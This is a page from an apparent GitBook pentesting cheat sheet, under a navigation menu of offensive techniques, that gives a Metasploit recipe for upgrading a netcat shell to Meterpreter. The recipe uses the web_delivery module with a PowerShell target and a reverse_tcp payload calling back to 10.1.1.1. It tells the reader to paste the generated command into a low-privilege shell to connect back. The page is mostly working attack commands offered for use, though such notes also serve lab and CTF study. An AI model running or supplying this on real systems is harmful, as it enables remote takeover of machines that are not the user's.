🙈
Pentesting
  • Tenaka.net
  • Links
    • Tenaka
    • GTFOBins
    • WinPeas
    • LinPeas
    • Hacktricks
    • OFFENSIVE SECURITY CHEATSHEET
  • Recon
    • NMAP
      • Basics
  • Enumeration
    • NMAP
      • LDAP
      • DNS
      • SMB
      • SQL
      • Web
    • Windows
      • Escalation Checks
      • Users
        • Users PS
        • Users ADSI
        • Users CMD
      • Host Config
      • Updates (All)
        • Exploit Suggester
      • Domain
        • Domain PS
        • Domain CMD
      • Computers
        • Computer PS
      • Components
        • Logical Disks
      • Networking
        • Networking CMD
        • Firewall CMD
      • Services
      • Passwords
        • Findstring
        • Registry
      • Groups
        • Groups PS
      • Misconfigurations
        • UnQuoted Paths (All)
      • Files and Folders
        • Data Streams
      • invoke-command
      • Registry
    • Linux
      • Paths
      • CVE's
      • Hosts File
      • Linux PrivEsc
      • File Permissions
      • Append to a file
      • SSH
    • Kali
      • Passwords\Usernames
    • Certificates
      • User Certificate to WinRM
    • FTP
    • Web
      • wfuzz
      • ffuf
      • gobuster
      • dirb
      • Dirbuster
      • Nikto
      • Wordpress
        • WPScan (wordpress)
        • Could be WPScan
        • WP Interesting paths
    • DNS
      • Hosts File
      • nslookup
      • Dig
      • dnsrecon
      • DNSAdmin Escalation
    • LDAP \ AD \ DC
      • ldapsearch
      • crackmapexec
      • enum4linux-ng
      • RPC
      • Kerbrute
      • Impacket
        • Pre-Authentication
        • SecretsDump - dump hashes
        • Kerberoasting
        • GoldenPAC
      • evil-winrm
      • smbclient
      • Bloodhound - AD Recon
      • DCSync
        • GetChangesAll
    • Group Policy
      • Gpp Password
    • SMB
      • crackmapexec
      • smbclient
      • enum4linux
      • MSFConsole
      • smbmap
        • Error Help
    • Databases
      • MS SQL
      • Read .mdb file
      • Read PST File
    • Exploit-DB
    • WinRM
      • evil-winrm using certs for connection
      • evil-winrm User creds
    • Files
      • Meta Data
      • .apk
    • Misc
      • Flask
      • RocketChat
    • Python
  • Exploitation
    • FTP
      • FTP Anonymous
    • Meterpreter
      • Potato and SeImpersonate
      • Exploit Suggest
        • Commands
    • MSVenom
      • Win Web ASPX
      • Python
      • Powershell
      • Windows
    • Reverse Shells
      • Groovy Script Console
      • Web Reverse Shell using Powershell
      • Upload and exe from web or ftp site
      • nc
      • Bash Reverse Shell
      • MSFConsole Reverse Shell
    • Metasploit
      • Double Pulsar
    • Burpsuite
      • Spraying
  • Boxes
    • Jeeves Potato Attack
    • AChat
  • Useful Commands
    • PowerSploit \ Empire
      • Importing Powersploit Module
    • Transfer Data
      • Downloading
        • Simple Web
        • SMB
        • Certutil
        • Powershell
        • wget
        • Curl
      • Uploading
        • SMB
    • Password Cracking
      • Hashcat
        • MD5
        • NTLM
        • Kerberos
      • Zip Files
      • PFX
      • Create password from scavenging website.
      • NTDS.dit
      • Hydra
        • ssh
      • Hashes
        • hash-identifier
      • Base64 Mapping
      • Hexdump xxp
      • VNC Decrypt Password
Powered by GitBook
On this page
  1. Exploitation
  2. Reverse Shells

Web Reverse Shell using Powershell

#Update nc reverse shell to meterpreter

msfconsole

use exploit/multi/script/web_delivery

options

show targets

set target 2 (powershell)

set payload windows/meterpreter/reverse_tcp

set lhost 10.1.1.1

set srvhost 10.1.1.1

run

copy output and paste into cmd of none priv shell to connect back

PreviousGroovy Script ConsoleNextUpload and exe from web or ftp site

Last updated 2 years ago